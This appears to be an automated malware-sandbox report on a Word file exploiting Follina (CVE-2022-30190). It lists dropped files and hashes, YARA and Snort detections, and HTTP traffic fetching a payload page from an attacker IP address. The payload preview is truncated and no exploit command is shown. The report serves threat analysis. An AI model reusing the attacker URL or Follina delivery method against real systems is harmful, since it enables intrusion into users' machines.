Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22102443317117917
Encrypted:	false
SSDEEP:	48:I32E3UrBcwO7h/8PV5jLqUAMU/cRMU/ck:K2E3Ccwch/QDjAMU0RMU0k
MD5:	2821462EBF84D7BED1E5C765DD2573B8
SHA1:	445DC2799504E4508476ABB19B0AB29F9E862A09
SHA-256:	D19F0CE09DBC66219C5E1C2212EEEB73004DB533932038AFE394794027CBBD1E
SHA-512:	6A9FFA8B8042BFFBA3639C892CFC939F0AFE94053A3DA245B15F2EEC2E35EB784A04AEAEC85B68C3DF916AAD9839F465349EE215BD31980D4AEFCBD8C7D1A6D3
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.m...J.7N[,S..S,...X.F...Fa.q............................../3...E.../7.x........J..Y.u.F.}c~.L..P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.9540734219927023
Encrypted:	false
SSDEEP:	3:yVlgsRlz8T0wel8NL7Qig9k+czXzlf276:yPblzbRRDGjzXzt22
MD5:	82D8CBB66D292D28791B2DDFCB3F2431
SHA1:	520EB0F9D499C470FA6E7DC581134B56F6473333
SHA-256:	0349FEF712B994680FB04C9BB1997B021C5F8DAE134F93182F18342945757049
SHA-512:	BC3A424CC3C84DDB2C65D4E0CE9B96DF1105DC15B179F78B1ACA24F7B5281895638751F9500B4BB0AF0A3041A66AE9DC4847365841445F8E8F2EC0D22E1FFD6B
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.7.4.F.2.B.1.7.8.-.0.0.A.E.-.4.2.4.F.-.8.3.E.7.-.B.A.5.9.9.E.8.2.8.2.5.4.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	6241
Entropy (8bit):	4.836014560592255
Encrypted:	false
SSDEEP:	192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
MD5:	A32050027AEA96B3B70E1056490A98C9
SHA1:	EF28C67583C8C8048C0BAAEAD036680A60441213
SHA-256:	E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
SHA-512:	1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
Malicious:	true
Yara Hits:	Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, Author: Joe Security
Reputation:	low
IE Cache URL:	http://185.234.247.119/123.RES
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FC6F522.RES

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6241
Entropy (8bit):	4.836014560592255
Encrypted:	false
SSDEEP:	192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
MD5:	A32050027AEA96B3B70E1056490A98C9
SHA1:	EF28C67583C8C8048C0BAAEAD036680A60441213
SHA-256:	E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
SHA-512:	1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
Malicious:	true
Yara Hits:	Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FC6F522.RES, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FC6F522.RES, Author: Joe Security
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F97180.RES

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6241
Entropy (8bit):	4.836014560592255
Encrypted:	false
SSDEEP:	192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
MD5:	A32050027AEA96B3B70E1056490A98C9
SHA1:	EF28C67583C8C8048C0BAAEAD036680A60441213
SHA-256:	E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
SHA-512:	1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
Malicious:	true
Yara Hits:	Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F97180.RES, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F97180.RES, Author: Joe Security
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	2.204971840955297
Encrypted:	false
SSDEEP:	12:rl3bn+kFIBmYwai621U/hCsSvuQWyRnNYnRn/5Co00RnNEKn7ivsS4CIsS4sS4Ch:r2BmK/eV8nNoWiCdeoG8noxoWi
MD5:	DD3D8735358776F47F3F4588129200A6
SHA1:	4510950838066EF408F0B44786FA17DAA6A9E0CC
SHA-256:	D68FF93964AD863C958AE9FBA71F293622CA019543D8F2F32EA7FB77111A0DDB
SHA-512:	7EBA213F0D96CC2D32A1EA69EDAF384A6B4BBB96BD18F406145B21E6A925731C6951A1051266A65C9883B7AB11E0B3733C6F381151886282796DC9F390B98028
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{93886B29-9649-4D5E-975D-770BA1081A48}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2130
Entropy (8bit):	1.1627960907898713
Encrypted:	false
SSDEEP:	6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRnyOLfEznRnyOLflqDmPm1PcV5:mbb2sOhYk5vnZA5Rn/YnRn/dom5
MD5:	645EA66E0489C4D8B0D4877F7A930E07
SHA1:	2961C4A1FDD07A4A6EFA47655C6087EB011B079E
SHA-256:	ED0BFA2837448DD790D7C0450339FBAEF480535517847634136BF9F7F0B91468
SHA-512:	0D1E3C8280255B0F329931CE8CE1810DFE32F5DA29A2FD9FE90B907A2546699B955D50519CE310BD63B5D84F5873F5FB3CCB0467FB48E47ABEA16962DC6BAACE
Malicious:	false
Reputation:	low
Preview:	....S.H.A.P.E. .X. .\.. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U.......j....U

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E4F5B659-EE23-4A39-84D5-F59507B69C67}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{81AEC75A-0A9E-4A32-B5F6-541A0FA08477}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025702809661217164
Encrypted:	false
SSDEEP:	6:I3DPcx3t6JavxggLRKwsB4RXv//4tfnRujlw//+GtluJ/eRuj:I3DPI5+gvYg3J/
MD5:	12657ECB0DD8B744608807DB5C70F0C7
SHA1:	9CE71D2E2CADA6C25168A26FF71CDED28695D0A2
SHA-256:	1AA90B3561CB40B6E35BBA8D20FDB007172F06FBF7E4ED1CC1AD1B7EF955E3E4
SHA-512:	F1FE88237F4D2648C52BBE4E138F6229EDD39E5CFD50DEBC92D782456EE6AF950E0146787199C8F108275A1557DDDE1CD3779AA4D1174A887E935FF1F69CA09B
Malicious:	false
Preview:	......M.eFy...z...... G..I-...MS,...X.F...Fa.q................................N&.M.U.H............./..8..L..=K!........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{ACD4BEAE-F768-48FA-AC51-627BB9420B93}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02563601517038645
Encrypted:	false
SSDEEP:	6:I3DPc2sRc9avxggLRmk9XgLkrfdRXv//4tfnRujlw//+GtluJ/eRuj:I3DPxsGcVXFrbvYg3J/
MD5:	22FA1EB8556154E2A6FECC5FA08D274E
SHA1:	615CD82CE3D9F9BF38FE78F0CF1A2754254A4B31
SHA-256:	C702AA3690D5FABD5D5F8B0376B275E34D9B5D23163A8CCDEAC7943625AFD06D
SHA-512:	1333A393635A4D08C1E07E54168659A7BC63E4745D914BDD1D91C81F0896C9CBBD8E1310B19FF563E9999FFA46676419DF1D1F8D1FA7274143F3281A074C7618
Malicious:	false
Preview:	......M.eFy...z).)..aeL...7zg.S,...X.F...Fa.q............................M.T.uy.@.!.m..L6........5.7}.7KG...Q.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc782.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:54 2022, mtime=Tue Mar 8 15:45:54 2022, atime=Wed Jun 8 00:38:14 2022, length=10144, window=hide
Category:	dropped
Size (bytes):	999
Entropy (8bit):	4.518251587426856
Encrypted:	false
SSDEEP:	12:80rgXg/XAlCPCHaXBKBnB/xQpX+WquYWaitCicvbdF42NDtZ3YilMMEpxRljKYtX:8C/XTRKJIgbWttJe7xDv3qTaY7h
MD5:	51D4ED26C8705FBE83CB8C15EE3B2BD8
SHA1:	342B0D8DF8E38387136D83AF766BE91256EF1A0B
SHA-256:	3D08E45B4B67ED3E1E498672E206F82C9D1F1842C85289E714F330E5E05D19BF
SHA-512:	59E59D8CE0395298163CC8FD031DBA03A56B2F9B3E8C19D3F8675811B6A463073F8BAA5B2A4E44E2811CB0E5B9FB97E755DFA3333EFA4E1F213C7D2E458EDE48
Malicious:	false
Preview:	L..................F.... ...Y.e..3..Y.e..3...B.k.z...'...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....`.2..'...T.. .DOC782~1.DOC..D......hT..hT.....r.....'...............d.o.c.7.8.2...d.o.c.x.......u...............-...8...[............?J......C:\Users\..#...................\\116938\Users.user\Desktop\doc782.docx.".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.7.8.2...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......116938..........D_....3N...W...9...N..... .....[D_....3N...W...9...N..... .....[....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	64
Entropy (8bit):	4.601202445739505
Encrypted:	false
SSDEEP:	3:bDuMJlZIbFXCmxWKIbFXCv:bCSa6c
MD5:	538F5016C24249AC1799BBBB20B4BD97
SHA1:	1B0ECD98E7D3BFECA78B00528138FA8D84F35BED
SHA-256:	249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F
SHA-512:	E0E8040389BABFFD046E57AAD3ECFEE9A9171B4D00EC75EE3DF48710FC452C479692121776D17DCBCCC72E4A1CA0B6570484C007B282C9DBF05EDD34C9463EDA
Malicious:	false
Preview:	[folders]..Templates.LNK=0..doc782.LNK=0..[misc]..doc782.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020303
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
MD5:	1674A1C7C99CD9FAADA789F5E2AEB335
SHA1:	26D9E81D5ED584A899A94D5EA8945A5AE3403F85
SHA-256:	BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
SHA-512:	B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

C:\Users\user\Desktop\~$doc782.docx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020303
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
MD5:	1674A1C7C99CD9FAADA789F5E2AEB335
SHA1:	26D9E81D5ED584A899A94D5EA8945A5AE3403F85
SHA-256:	BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
SHA-512:	B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
Malicious:	true
Preview:	.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

Static File Info

General

File type:	Microsoft OOXML
Entropy (8bit):	7.869060797789825
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	doc782.docx
File size:	10144
MD5:	e7015438268464cedad98b1544d643ad
SHA1:	03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256:	d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
SHA512:	d134d87c28acb758b897a287a9f6ce86776f384f43ee963f52b40e173b6bfcd9dc76e5f64b9a40b93d3bf2a5b988f842c27c90611a8b4408abd9e197191e4aad
SSDEEP:	192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ9Q7dlpN2:snPj8I10lD9+2Vvx9qlpN2
TLSH:	A3228E3ADA5508B5CAD2A275E0AC0B2AD30C42BBB73BE9CB65C653E402C85DB0F5530C
File Content Preview:	PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!\|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
185.234.247.119192.168.2.2280491732036726 06/07/22-18:38:14.250872	TCP	2036726	ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)	80	49173	185.234.247.119	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 7, 2022 18:38:04.559988022 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:04.587605953 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:04.587683916 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:04.587856054 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:04.615333080 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:04.615535021 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:04.615578890 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:10.103796005 CEST	49174	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:10.131787062 CEST	80	49174	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:10.131875992 CEST	49174	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:10.132050991 CEST	49174	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:10.160005093 CEST	80	49174	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:10.160626888 CEST	80	49174	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:10.372772932 CEST	49174	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:10.388240099 CEST	80	49174	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:10.388413906 CEST	49174	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.112446070 CEST	49175	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.140769958 CEST	80	49175	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.140855074 CEST	49175	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.141001940 CEST	49175	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.171103954 CEST	80	49175	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.171741962 CEST	80	49175	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.222954988 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.250871897 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.250910044 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.250941992 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.250956059 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.250973940 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.250988007 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.251005888 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.251019001 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.251049042 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.382347107 CEST	49175	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.401310921 CEST	80	49175	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.401400089 CEST	49175	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.639050961 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.674964905 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.675029039 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.681684017 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.709424973 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.709614038 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.734277010 CEST	49174	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.762449980 CEST	80	49174	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.802052975 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.829963923 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.830189943 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.975172043 CEST	49174	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:14.990220070 CEST	80	49174	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:14.990324020 CEST	49174	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:15.016185045 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:38:15.044190884 CEST	80	49173	185.234.247.119	192.168.2.22
Jun 7, 2022 18:38:15.044383049 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:39:15.056456089 CEST	49174	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:39:17.564933062 CEST	49173	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:39:19.173058987 CEST	80	49175	185.234.247.119	192.168.2.22
Jun 7, 2022 18:39:19.173165083 CEST	49175	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:39:19.173510075 CEST	49175	80	192.168.2.22	185.234.247.119
Jun 7, 2022 18:39:19.201189041 CEST	80	49175	185.234.247.119	192.168.2.22

HTTP Request Dependency Graph

185.234.247.119

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49173	185.234.247.119	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2022 18:38:04.587856054 CEST	1	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: 185.234.247.119 Content-Length: 0 Connection: Keep-Alive
Jun 7, 2022 18:38:04.615535021 CEST	2	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Tue, 07 Jun 2022 16:38:04 GMT Content-Type: text/html Content-Length: 150 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Jun 7, 2022 18:38:14.222954988 CEST	4	OUT	GET /123.RES HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.234.247.119 Connection: Keep-Alive
